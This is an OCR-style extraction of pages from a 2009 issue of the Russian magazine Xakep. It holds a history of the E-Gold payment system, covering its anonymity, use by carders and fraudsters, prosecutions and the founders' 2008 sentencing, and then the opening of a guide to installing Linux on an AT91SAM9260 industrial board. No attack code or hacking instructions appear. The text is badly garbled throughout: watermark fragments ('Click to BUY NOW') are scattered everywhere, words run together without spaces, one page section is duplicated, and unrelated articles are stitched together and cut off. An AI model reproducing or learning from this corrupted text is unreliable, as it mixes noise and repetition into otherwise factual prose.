BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
>>
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
сценаw |
|
|
to |
|
|
|
|
|
||
w Click |
|
|
|
|
|
|
||||
|
|
|
|
|
o |
m |
||||
|
w |
|
|
|
|
|
|
|
|
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
ТАБЛИЦАТЕКУЩЕЙСТОИМОСТИ«ЭЛЕКТРОННЫХМЕТАЛЛОВ»
вероятно, чтоонитебенезнакомы— компа- |
черезобменныйпунктэлектронныхвалют. С |
вые, деньги в ней не циркулировали. Во |
ниярастеряласвоюпопулярностьиначала |
выводомденегвсетожевыгляделопри- |
всяком случае, именно так звучала позиция |
«тонуть» ещевсамомначалеXXI столетия. |
вычно: егоможнобылоосуществитьчерез |
доктора Джексона. |
Многиепопростуеенезастали. |
любойэлектронныйобменник, банковский |
Все это, разумеется, привело к повышен- |
В отличие от привычных для нас сегодня |
чекилиперевод, атакже, теоретически, даже |
ному вниманию со стороны правительства, |
электронных платежных систем, E-Gold не |
получитьнарукисвойслитокдрагоценного |
но ситуация вокруг E-Gold развивалась |
использует денежных единиц. Вместо них |
металла. |
весьма неспешно, вплоть до 9 сентяб- |
все строится на самых настоящих драгме- |
Сложнонеоценитькрасотуиизяществоза- |
ря 2001 года. А вот после падения ба- |
таллах — то есть, золоте, серебре, платине |
думкиДжексона, однакоихоказалосьнедо- |
шен-близнецов в Штатах было принято |
и палладии. Физические запасы компании |
статочно. Хотьиговорят, что«всегениальное |
множество мер, направленных на борьбу с |
— ее Золотой фонд — хранятся в слитках |
— просто», простотаигениальностьсыграли |
терроризмом, в том числе, широко извест- |
(почти 2.5 тонны одного только золота!), |
скорее«против», чем«за» E-Gold. |
ные «Акт о национальной безопасности» |
в надежных банковских хранилищах, |
|
и «Патриотический акт». По сути, немало |
подальше от физических, политических и |
ВХОЖДЕНИЕ В ШТОПОР Успехи |
законов в то время попросту протолкнули |
других рисков. Так что, при расчетах через |
платежной системы и ее стремитель- |
«под шумок», так что узаконенная про- |
E-Gold счет идет не на условные единицы, |
ный рост не остались незамеченными. С |
слушка телефонных разговоров и прочие, |
а на тройские унции (XAU) и граммы (AUG). |
увеличением числа зарегистрированных |
не слишком приятные, вещи стали реаль- |
Это позволяет забыть о колебаниях курсов |
пользователей (к началу 2003 года их был |
ностью. Само собой, и для платежной сис- |
валют — стоимость ценных металлов на |
уже миллион), у компании появлялись |
темы, которая, по мнению правительства и |
мировых рынках вещь гораздо более пос- |
конкуренты, завистники и люди, недоволь- |
недоброжелателей, имевших большой вес |
тоянная. |
ные ее деятельностью. Основная проблема |
в политических и финансовых структурах, |
Сюридическойточкизренияполучалось, что |
заключалась в том, что E-Gold фактически |
«крышевала» мошенников и порнографов, |
людиобмениваютсяраспискамиоразмеще- |
не требовал для регистрации никаких |
пришло время или менять свою политику, |
нииопределенногоколичествадрагметалла |
удостоверений личности. Данные, введен- |
или же отправляться под суд. |
нахранениевкомпанииE-Gold Ltd. (почти |
ные пользователем, никак не проверялись, |
Какнистранно, E-Gold негорелжеланием |
всеполномочияпоуправлениюсистемой |
не существовало и лимита на количество |
меняться. Неизвестно, насколькоправди- |
электронныхплатежейбылипереданы |
аккаунтов, открытых на одного человека. |
выслухиотом, чторуководствокомпании |
компанииE-Gold Ltd., зарегистрированнойв |
Единственным «строгим требованием» был |
прекраснозналоопроходящихчерезих |
Вест-Индии). |
адрес электронной почты. Получалось, что |
системупотоках«грязныхденег» иимелос |
Системаспециальностроиласьтаким |
сервис легкодоступен, прост (все операции |
нихнемалуюприбыль— нотогдаговорили |
образом, чтобынезависетьотфинансовых |
совершались прямо в браузере) и практи- |
иписалиобэтоммного. Хотясудутакине |
рынков, самакомпаниянеобладаланикакой |
чески анонимен. К тому же, отменить тран- |
удалосьдоказатьвинувладельцевсистемы, |
национальнойвалютойинеимеласчетовв |
закцию в E-Gold было делом проблемным, |
однозначносказать«было» или«небыло» — |
банках. Плюсковсему, средстваклиентов |
если не сказать, малореальным. Все это, |
невозможно. |
являлисьактивами, находящимисянахра- |
само собой, привлекло внимание не только |
Однакомызабегаемвперед, атогда, вначале |
нении, а, значит, немоглибытьпредметом |
простых пользователей, но и аферистов |
2000-х, разрешитьвопросмиромневышло. |
судебныхпритязаний. |
всех мастей — от банальных кидал до |
Компаниянехотела, немоглаилинесчитала |
Спомощью«электронногозолота» можно |
кардеров и, предположительно, торговцев |
нужнымвводитьболеесерьезныеспособы |
былоделатьпереводыдругимпользова- |
детским порно. Вдобавок, у E-Gold на руках |
идентификациипользователейисбольшей |
телям, приниматьплатежинасвойсчет, |
не было необходимых по закону лицензий |
ответственностьюподходитькконтролюнад |
расплачиватьсявинтернет-магазинахит.д. |
для осуществления денежных переводов. |
транзакциями. Последующиегодыпреврати- |
Вводденегвсистемуосуществлялсяобыч- |
А лицензии отсутствовали в виду того, что |
лисьдляE-Gold вчередусудебныхразбира- |
нымиметодами— банковскимплатежом, |
расписки, имеющие хождение в системе, |
тельств. Изаэтовремяпрессауспела«похо- |
переводомотдругогопользователяилиже |
оставались лишь расписками, и, как тако- |
ронить» компаниюнеменьшедесяткараз. |
XÀÊÅÐ 05 /125/ 09 |
075 |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
C |
|
E |
|
|||
|
|
X |
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
||
|
F |
|
|
|
|
|
|
t |
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
r |
|
P |
|
|
|
|
|
NOW! |
o |
||
|
|
|
|
|
|
||||
w Click |
|
BUY |
>>m |
||||||
to |
|
|
|
||||||
|
|
|
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
. |
|
|
|
|
|
.c |
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
df |
|
|
n |
e |
||
|
|
|
|
-xcha |
|
|
|
сцена
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
СОЗДАТЕЛЬE-GOLD, ДОКТОР ДУГЛАСДЖЕКСОН
Непосредственныедействия«поборьбес E-Gold» былиразвернутытольков2004-2005 годах. Готовилиськнимосновательноидавно, такчтообвинили«электронноезолото» практическивовсехсмертныхгрехахсразу. Еслиточнее, вмениливвину, что, являясь юридическимлицом, компаниязанимается денежнымитранзакциямибезсоответствующейнатолицензии; фактически способствуетразвитиюпротивозаконнойдеятельностифинансовыхпирамид, киберпреступниковиижесними, оказывая имбанковскиеуслуги; атакжеотмывает деньгипорнографов(втомчисле, детских). Расчехливлюбимыепугала— терроризми детскоепорно, к2005-мугодуправительст- воокончательновышлона«тропувойны».
ОфисыкомпанииGold&Silver Reserve, Inc. подверглисьобыску, абанковские счетабылизаморожены. Властивпервые попыталисьдоказатьвсуде, чтовсистеме
циркулируютворованныеденьги. Впрочем, изэтогоничегоневышло. В2006-мсудвы- несоправдательныйприговор, попричине отсутствиядоказательстввиныE-Gold.
Тогдакомпания, посути, отделаласьлегким испугом, имногиерассчитывали, чтопосле этого«инцидента» руководствоE-Gold образумитсяиначнетприниматьмерыи затягиватьгайки. НоДжексон, Даунииих коллегирешилииначе— переменвсистеме непоследовало.
Параллельноссудебнымпроцессом, репута- циюE-Gold портилапресса. Товодном, тов другомавторитетномIT-изданиивсплывала информацияонезаконныхоперациях, прово- дящихсячерезE-Gold.
Например, BusinessWeek сообщал, что крупная международная команда кардеров ShadowCrew активно использует «электронное золото», перекачивая через него от $40.000 до $100.000 в неделю. Интересно, что в это же самое время официальная статистика компании утверждала, что по данным на апрель 2006-го, только у двадцати четырех клиентов на счету было свыше
ИНТЕРЕСНАЯСТАТИСТИКАПОМЕТАЛЛАМИАККАУНТАМ
Основнаяпроблемазаключаласьвтом, чтоE-Gold фактическинетребовалдля регистрацииникакихудостоверений личности.
10 килограммов золота (что примерно равно $200.000). О том, что один человек может иметь и 5, и 15 депозитов статистика тактично умалчивала.
Вответ на эти, в общем-то, логичные, выпады Джексон публично заявлял, что все операции в его системе легальны, а нажитые незаконным путем средства — проблема никак не компании E-Gold, а людей, которые эти деньги крадут. Он говорил, что другие платежные системы не менее виновны «в отмывании денег» и советовал властям обратить внимание на тот же PayPal.
Атакже Дуглас не уставал напоминать прессе и сильным мира сего о том, что E-Gold всегда охотно сотрудничает с правоохранительными органами, помогая в расследованиях ФБР, федеральной торговой комиссии, внутренней налоговой службе, управлению по борьбе с наркотиками и так далее.
Всамом деле, в E-Gold даже начали уст-
раивать демонстрационно-показательные облавы, в ходе которых аккаунты блокировались тысячами, а сам основатель компании помогал властям в обучении борцов с кибер-преступностью. Но и этого оказалось недостаточно.
ЕщеодинтяжелыйударсистеменанесаукционeBay, в2006 годуполностьюперешедший наPayPal иотказавшийсяотуслугдругих сервисовэлектронныхплатежей. Ипускай E-Gold быладалеконеединственной«оставленнойзабортом» системой, наeBay «электронноезолото» былоупомянутоотдельной строкой. Правилааукционаподчеркивали, чтоиспользованиеE-Gold караетсянемедленнымзакрытиемаккаунтапродавца(добавим, чтоаналогичнуюмеруможносхлопотать отнюдьнетолькозаиспользованиеE-Gold).
ЗАБВЕНИЕНесмотрянато, чтонапро- тяжениивсейстатьиречьоE-Gold идетв прошедшемвремени, сегоднякомпанияи
076 |
XÀÊÅÐ 05 /125/ 09 |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
C |
|
E |
|
|||
|
|
X |
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
||
|
F |
|
|
|
|
|
|
t |
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
r |
|
P |
|
|
|
|
|
NOW! |
o |
||
|
|
|
|
|
|
||||
w Click |
|
BUY |
>>m |
||||||
to |
|
|
|
||||||
|
|
|
|
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
. |
|
|
|
|
|
.c |
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
df |
|
|
n |
e |
||
|
|
|
|
-xcha |
|
|
|
сцена
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
СОЗДАТЕЛЬE-GOLD, ДОКТОР ДУГЛАСДЖЕКСОН
Непосредственныедействия«поборьбес E-Gold» былиразвернутытольков2004-2005 годах. Готовилиськнимосновательноидавно, такчтообвинили«электронноезолото» практическивовсехсмертныхгрехахсразу. Еслиточнее, вмениливвину, что, являясь юридическимлицом, компаниязанимается денежнымитранзакциямибезсоответствующейнатолицензии; фактически способствуетразвитиюпротивозаконнойдеятельностифинансовыхпирамид, киберпреступниковиижесними, оказывая имбанковскиеуслуги; атакжеотмывает деньгипорнографов(втомчисле, детских). Расчехливлюбимыепугала— терроризми детскоепорно, к2005-мугодуправительст- воокончательновышлона«тропувойны».
ОфисыкомпанииGold&Silver Reserve, Inc. подверглисьобыску, абанковские счетабылизаморожены. Властивпервые попыталисьдоказатьвсуде, чтовсистеме
циркулируютворованныеденьги. Впрочем, изэтогоничегоневышло. В2006-мсудвы- несоправдательныйприговор, попричине отсутствиядоказательстввиныE-Gold.
Тогдакомпания, посути, отделаласьлегким испугом, имногиерассчитывали, чтопосле этого«инцидента» руководствоE-Gold образумитсяиначнетприниматьмерыи затягиватьгайки. НоДжексон, Даунииих коллегирешилииначе— переменвсистеме непоследовало.
Параллельноссудебнымпроцессом, репута- циюE-Gold портилапресса. Товодном, тов другомавторитетномIT-изданиивсплывала информацияонезаконныхоперациях, прово- дящихсячерезE-Gold.
Например, BusinessWeek сообщал, что крупная международная команда кардеров ShadowCrew активно использует «электронное золото», перекачивая через него от $40.000 до $100.000 в неделю. Интересно, что в это же самое время официальная статистика компании утверждала, что по данным на апрель 2006-го, только у двадцати четырех клиентов на счету было свыше
ИНТЕРЕСНАЯСТАТИСТИКАПОМЕТАЛЛАМИАККАУНТАМ
«ОСНОВНАЯПРОБЛЕМАЗАКЛЮЧАЛАСЬВТОМ, ЧТОE-GOLD ФАКТИЧЕСКИНЕТРЕБОВАЛДЛЯРЕГИСТРАЦИИНИКАКИХУДОСТОВЕРЕНИЙ ЛИЧНОСТИ.»
10 килограммов золота (что примерно равно $200.000). О том, что один человек может иметь и 5, и 15 депозитов статистика тактично умалчивала.
Вответ на эти, в общем-то, логичные, выпады Джексон публично заявлял, что все операции в его системе легальны, а нажитые незаконным путем средства — проблема никак не компании E-Gold, а людей, которые эти деньги крадут. Он говорил, что другие платежные системы не менее виновны «в отмывании денег» и советовал властям обратить внимание на тот же PayPal.
Атакже Дуглас не уставал напоминать прессе и сильным мира сего о том, что E-Gold всегда охотно сотрудничает с правоохранительными органами, помогая в расследованиях ФБР, федеральной торговой комиссии, внутренней налоговой службе, управлению по борьбе с наркотиками и так далее.
Всамом деле, в E-Gold даже начали уст-
раивать демонстрационно-показательные облавы, в ходе которых аккаунты блокировались тысячами, а сам основатель компании помогал властям в обучении борцов с кибер-преступностью. Но и этого оказалось недостаточно.
ЕщеодинтяжелыйударсистеменанесаукционeBay, в2006 годуполностьюперешедший наPayPal иотказавшийсяотуслугдругих сервисовэлектронныхплатежей. Ипускай E-Gold быладалеконеединственной«оставленнойзабортом» системой, наeBay «электронноезолото» былоупомянутоотдельной строкой. Правилааукционаподчеркивали, чтоиспользованиеE-Gold караетсянемедленнымзакрытиемаккаунтапродавца(добавим, чтоаналогичнуюмеруможносхлопотать отнюдьнетолькозаиспользованиеE-Gold).
ЗАБВЕНИЕНесмотрянато, чтонапро- тяжениивсейстатьиречьоE-Gold идетв прошедшемвремени, сегоднякомпанияи
076 |
XÀÊÅÐ 05 /125/ 09 |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
|
Gold |
- |
|
E |
|
E |
>> |
- |
|
|
Gold |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
сценаw |
|
|
to |
|
|
|
|
|
||
w Click |
|
|
|
|
|
|
||||
|
|
|
|
|
o |
m |
||||
|
w |
|
|
|
|
|
|
|
|
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
ОФИЦИАЛЬНЫЙСАЙТE-GOLD.COM ВЫГЛЯДИТНЕСЛИШКОМСОВРЕМЕННО
самаплатежнаясистемавсеещеживы. |
Джексона обязали раскошелиться на $200 |
видимо, и ожидалось) побежали, словно |
Приэтом: |
(это не опечатка — двести зеленых бумаж- |
крысы с тонущего корабля, и спешно броси- |
• созданиеновыхаккаунтов«временно |
ных денег), а Дауни и Рейд Джексона — на |
лись выводить со своих счетов средства, что |
заморожено»; |
$2.500 каждого. Но что самое любопытное |
тоже не улучшило общего положения дел. |
• вывестиденьгисужеимеющегосясчета |
— деятельность компании суд так же не |
Раздутая вокруг E-Gold паника больно уда- |
можнолишьсогромнымтрудом. |
пресек. Вместо этого судья Розмари Кольер |
рила по курсу «электронного золота» и по- |
Ниодинчеловеквздравомуменестанет |
постановила, что Gold & Silver Reserve |
родила сумасшедшие проценты комиссии. |
расплачиватьсячерезE-Gold, но«электрон- |
должны оформить все необходимые для |
Если сегодня попытаться вывести средст- |
ноезолото» нежелаетидтикодну. Затяжная |
работы лицензии и привести регистрацию |
ва со счета E-Gold, придется попотеть, |
агония, начавшаясявсерединедесятилетия, |
новых аккаунтов в системе к нормам, пре- |
разыскивая обменник и, даже если таковой |
продолжаетсядосихпор. |
дусмотренным законом. |
найдется, — придется заплатить порядка |
После первой попытки «штурма» власти |
Последнее, впрочем, былосделаноещеза |
70% комиссии. |
не оставили E-Gold в покое, и в 2007 году |
полгодадоокончанияпроцесса. Видимо, |
Что будет с E-Gold дальше, сказать слож- |
выдвинули против G&SR новый иск со ста- |
поняв, чтововторойразсухимиизводыим |
но. Несмотря на критическое положение, |
рыми претензиями. Ореол крайне сомни- |
выйтинеудастся, вE-Gold, наконец, начали |
доктор Джексон не унывает. Он охотно |
тельной славы, к этому моменту уже плотно |
действоватьнаопережение— например, |
рассказывает всем, кто готов его слу- |
окруживший систему, начал отпугивать |
сталитребоватьотпользователейнормаль- |
шать, о том, каким модификациям сейчас |
рядовых пользователей. Зато, похоже, он |
нуюконтактнуюинформацию, регистраци- |
подвергается E-Gold, и о ее будущих |
ничуть не тревожил аферистов — новые |
онныйномерналогоплательщика, атакже |
надежности и удобстве. Но техничес- |
аккаунты в системе плодились со скоростью |
указаниеместажительстваидатырождения. |
кая сторона дела, это только полбеды. |
примерно 95 тысяч в месяц. Интерес к E- |
Плюс, наконец, запретилирегистрировать |
Компания пока даже не пытается «по- |
Gold снижался — из-за этого золотой фонд |
несколькоаккаунтовнаодногочеловекаи |
вернуться к пользователям лицом» и не |
компании, ранее составлявший почти 3.5 |
внесливпользовательскоесоглашениеряд |
предпринимает попыток хоть как-то реа- |
тонны золота, за год сократился почти на |
изменений, призванныхподпортитьжизнь |
билитироваться в глазах общественнос- |
треть. К середине 2008-го от него осталось |
кибермошенникам. |
ти. Возникает ощущение, что руководс- |
лишь 2.420 кг. |
Однаковрядлиможносказать, чтовсеснова |
тву попросту наплевать на промоушен |
В итоге, летом 2008 года, после предва- |
закончилосьхорошо. Хотякомпанияфор- |
и собственный облик. Чего стоит один |
рительных слушаний, руководство E-Gold |
мальнодосихпорнезакрыта, еерепутация |
только официальный сайт компании, |
решило признать свою вину. Очевидно, это |
безнадежноиспорчена. Регистрацияновых |
вызывающий чувство острой ностальгии |
было продуманное решение — учитывая |
пользователейзаморожена, процессполу- |
по 90-м и молодому интернету. |
тяжесть выдвинутых обвинений, вынесен- |
чениялицензий, очевидно, затягивается, а |
Впрочем, E-Gold на протяжении всей |
ный в конце 2008 года приговор оказался |
довериедавноподорвано. |
ее 13-летней истории всегда везло |
слишком уж мягким. Дугласа Джексона, его |
В 2008-м масла в огонь подлили и постоян- |
и, возможно, повезет еще раз. Шанс, |
брата Рейда и Барри Дауни приговорили |
ные DDoS-атаки на E-Gold, и пущенная тогда |
что компания восстанет из пепла и |
к 3 годам условно (включая полгода под |
же «утка», гласившая, что систему якобы за- |
предстанет перед нами в новом свете, |
домашним арестом и электронным наблю- |
крыли, E-Gold — банкрот и теперь не сможет |
все же, отличен от нуля, тем более что |
дением), а также — к 300 часам обществен- |
расплатиться со своими клиентами. Из-за |
трения с властями, похоже, наконец-то, |
ных работ. Всех троих обложили штрафом: |
последнего сообщения пользователи (как, |
урегулированы.z |
XÀÊÅÐ 05 /125/ 09 |
|
077 |
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
||
|
|
|
C |
|
E |
|
|
|
|
|
|
|
C |
|
E |
|
|
|
||||||
|
|
X |
|
|
|
|
|
|
|
|
|
X |
|
|
|
|
|
|
||||||
|
- |
|
|
|
|
|
d |
|
|
|
- |
|
|
|
|
|
d |
|
||||||
|
F |
|
|
|
|
|
|
|
t |
|
|
|
F |
|
|
|
|
|
|
|
t |
|
||
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
|
|
|
|
|
|
|
|
|
|
|
r |
|||
P |
|
|
|
|
|
NOW! |
o |
|
|
P |
|
|
|
|
|
NOW! |
o |
|||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||
|
|
|
|
|
BUY |
>>m |
|
|
|
|
|
|
|
BUY |
|
|
||||||||
w Click |
to |
|
|
|
|
unixoid |
|
w Click |
to |
|
|
|
|
|
m |
|||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
||
|
w |
|
|
|
|
|
|
|
|
o |
|
|
|
w |
|
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
g |
.c |
|
|
|
. |
|
|
|
|
g |
.c |
|
||||||
|
|
p |
|
|
|
|
|
|
|
|
|
|
p |
|
|
|
|
|
|
|
||||
|
|
|
df |
|
|
n |
e |
|
|
|
|
|
df |
|
|
n |
e |
|
||||||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
|
|
-x cha |
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|
AT91SAM9260 |
ALTERA |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
NAMD256M |
|
Ethernet |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
ЕВГЕНИЙ «J1M» ЗОБНИН |
|
|
|
|
|
|
|
|
|
|
|
|
|
|||
|
|
|
|
|
|
|
|
/ZOBNIN@GMAIL.COM/ |
|
|
|
|
|
|
|
|
|
|
|
|
|
|||
|
|
|
|
|
|
|
ЧЕМПИОН |
Ethernet |
|
|
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
ВЛЕГКОМВЕСЕ |
AT91SAM9260 |
|
|
|
|
|
|
|
|
|
|
|
|||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Практическоеруководствопопоселению |
|
|
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
GNU/Linux намикроконтроллере |
|
|
|
|
|
|
|
|
|
|
|
|
|
Цельпроста— научитьсяставитьОСнабазеLinux начто-то, отличноеотвездесущейархитектурыIBM PC. Полагаю, утебяесть такоеустройство, бывшеесовсемнедавномаршрутизатором иликаким-нибудьпромышленнымкомпьютером. Либотыпотратилсяикупилполноценныйодноплатник, чтобыиспользоватьего вкачествеотдельногофайл-сервера. Длятакихфункцийписать снуляпрошивкунеимеетсмысла, авотпоставитьспециальный дистрибутивLinux — самоето!
>> unixoid
KORSET — HIDS БЕЗЛОЖ-
НЫХСРАБАТЫВАНИЙ
Впредыдущемномере, напомню, былаосвещенатеоретическаясторонавопросаипроведен обзорпопулярныхархитектуридистрибутивов длявстраиваемыхустройств. Сегоднязаймемся собственноустановкойЛинукса.
Понятно, чтовтвоемслучаеможетбытьсовершеннодругаяплатасдругимконтроллером. Нопрограммированиевстраиваемыхустройств всегдапроходитпооднимитемжешагам, поэтому, научившисьвседелатьнамоемпримере, нетрудноперенестиполученныйопытнатвой девайс, чутокподправивалгоритм. Отличия будут, ночащевсего— несущественные, причемвсетонкостипрошивкиотдельновзятого устройстваподробноописываютсявDatasheet кконтроллеруинасайтепроизводителя. Также, дляуспешногозавершениямиссии, неплохобыиметьбазовыезнанияпопроцессу загрузкиLinux изнать, чтоесть«периферия», «контроллер», «файловаясистема». Передтем, какчто-либопрошивать, получимаксимумин-
формацииоподопытномустройстве: перепиши маркировкимикросхем, узнайобъемитипы памяти, почитайофициальныйсайтифорумы. Наверняка, тынепервый, ктоустанавливает Linux наподобныйдевайс— иучитьсялучше начужихошибках, чемнасвоих.
Делатьвсебудемпошагам. Ипомни, ситуация неявляетсябезвыходнойдотехпор, покаизустройстванепойдетдым:).
КАПРИЗНЫЙМОНСТР
(две микросхемы по 32 Мб шириной 16 бит)
•NAND-Flash: 256 Ìá
•DataFlash íà SPI-интерфейсе Atmel AT45DB041B: 1 Мб
•Микросхема физического уровня Ethernet, совместимая с IEEE 802.3: Micrel KSZ8041TL
•На плату также выведены USB-хост и DBGU-интерфейс
Уменяестьпромышленныйкомпьютер |
Надопомнить, чтоAT91SAM9260 уженесовсем |
sh27cnc1, припроектированиикоторогобыл |
микроконтроллервтомсмысле, которыймы |
взятзаосновуAtmel’овскийотладочныйнабор |
привыкливкладыватьвэтопонятие. Ведьвнут- |
AT91SAM9260-EK идобавленонесколькоузлов |
риунегонуоченьмноговсякойразнообразной |
типаПЛИС(программируемыелогическиеин- |
периферии, начинаясЦАПадлявыводазвука |
тегральныесхемы) откомпанииAltera, атакже |
изаканчиваяконтроллерамилокалки(EMAC — |
парапараллельныхпортов. Вотегоключевые |
уровеньEthernet) иFlash-памяти. Вэтомсмыс- |
компоненты: |
ле9260 — самый, чтонинаесть, компьютер-на- |
|
кристалле. Носдругойстороны, оперативной |
• Микроконтроллер Atmel AT91SAM9260 |
памятиунеговнутри— всего8 Кб, изкоторых |
в корпусе PQFP |
тебедоступнотолько4, аэнергонезависимой |
• Оперативная память: 64 Мб SDRAM |
тамнетвообще. Этотнедостатокприходится |
|
|
078 |
XÀÊÅÐ 05 /125/ 09 |